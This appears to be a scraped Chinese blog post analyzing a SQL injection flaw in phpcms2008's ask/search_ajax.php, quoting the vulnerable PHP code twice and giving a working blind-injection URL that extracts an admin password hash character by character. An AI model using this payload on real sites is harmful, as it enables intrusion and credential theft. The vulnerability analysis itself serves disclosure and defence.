phpcms2008 注入漏洞 利用分析
程序员文章站
2022-06-28 14:08:42
这个是最新有人发现的
该漏洞文件:ask/search_ajax.php
漏洞说明:
/ask/search_ajax.php
Code:
if($q)
{
$where = " title LIKE '%$q%' AND status = 5";//没... 09-04-15...
这个是最新有人发现的
该漏洞文件:ask/search_ajax.php
漏洞说明:
/ask/search_ajax.php
code:
if($q)
{
$where = " title like '%$q%' and status = 5";//没做过滤直接感染了$where
}
else
{
exit('null');
}
$infos = $ask->listinfo($where, 'askid desc', '', 10);
/ask/include/answer.class.php
code:
function listinfo($where = '', $order = '', $page = 1, $pagesize = 50)
{
if($where) $where = " where $where";
if($order) $order = " order by $order";
$page = max(intval($page), 1);
$offset = $pagesize*($page-1);
$limit = " limit $offset, $pagesize";
$r = $this->db->get_one("select count(*) as number from $this->table_posts $where");
$number = $r['number'];
$this->pages = pages($number, $page, $pagesize);
$array = array();
$i = 1;
$result = $this->db->query("select * from $this->table_posts $where $order $limit");
while($r = $this->db->fetch_array($result))
{
$r['orderid'] = $i;
$array[] = $r;
$i++;
}
$this->number = $this->db->num_rows($result);
$this->db->free_result($result);
return $array;
}
测试方法:
/ask/search_ajax.php?q=s%d5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636d73)>52%23
该漏洞文件:ask/search_ajax.php
漏洞说明:
/ask/search_ajax.php
code:
if($q)
{
$where = " title like '%$q%' and status = 5";//没做过滤直接感染了$where
}
else
{
exit('null');
}
$infos = $ask->listinfo($where, 'askid desc', '', 10);
/ask/include/answer.class.php
code:
function listinfo($where = '', $order = '', $page = 1, $pagesize = 50)
{
if($where) $where = " where $where";
if($order) $order = " order by $order";
$page = max(intval($page), 1);
$offset = $pagesize*($page-1);
$limit = " limit $offset, $pagesize";
$r = $this->db->get_one("select count(*) as number from $this->table_posts $where");
$number = $r['number'];
$this->pages = pages($number, $page, $pagesize);
$array = array();
$i = 1;
$result = $this->db->query("select * from $this->table_posts $where $order $limit");
while($r = $this->db->fetch_array($result))
{
$r['orderid'] = $i;
$array[] = $r;
$i++;
}
$this->number = $this->db->num_rows($result);
$this->db->free_result($result);
return $array;
}
测试方法:
复制代码
代码如下:/ask/search_ajax.php?q=s%d5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636d73)>52%23
推荐阅读
-
网站漏洞检测之用户密码找回网站漏洞的安全分析与利用
-
PHP利用hash冲突漏洞进行DDoS攻击的方法分析
-
SpringBoot SpEL表达式注入漏洞-分析与复现
-
BOSSI 公司企业网站管理系统注入&上传漏洞利用
-
对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析
-
PhpMyAdmin4.8.1文件包含漏洞分析及复现利用(CVE-2018-12613)
-
CVE-2016-10191 FFmpeg RTMP Heap Buffer Overflow 漏洞分析及利用
-
CVE-2016-10190 FFmpeg Http协议 heap buffer overflow漏洞分析及利用
-
利用Request对象的包解析漏洞绕过防注入程序
-
Mysql身份认证漏洞的分析以及利用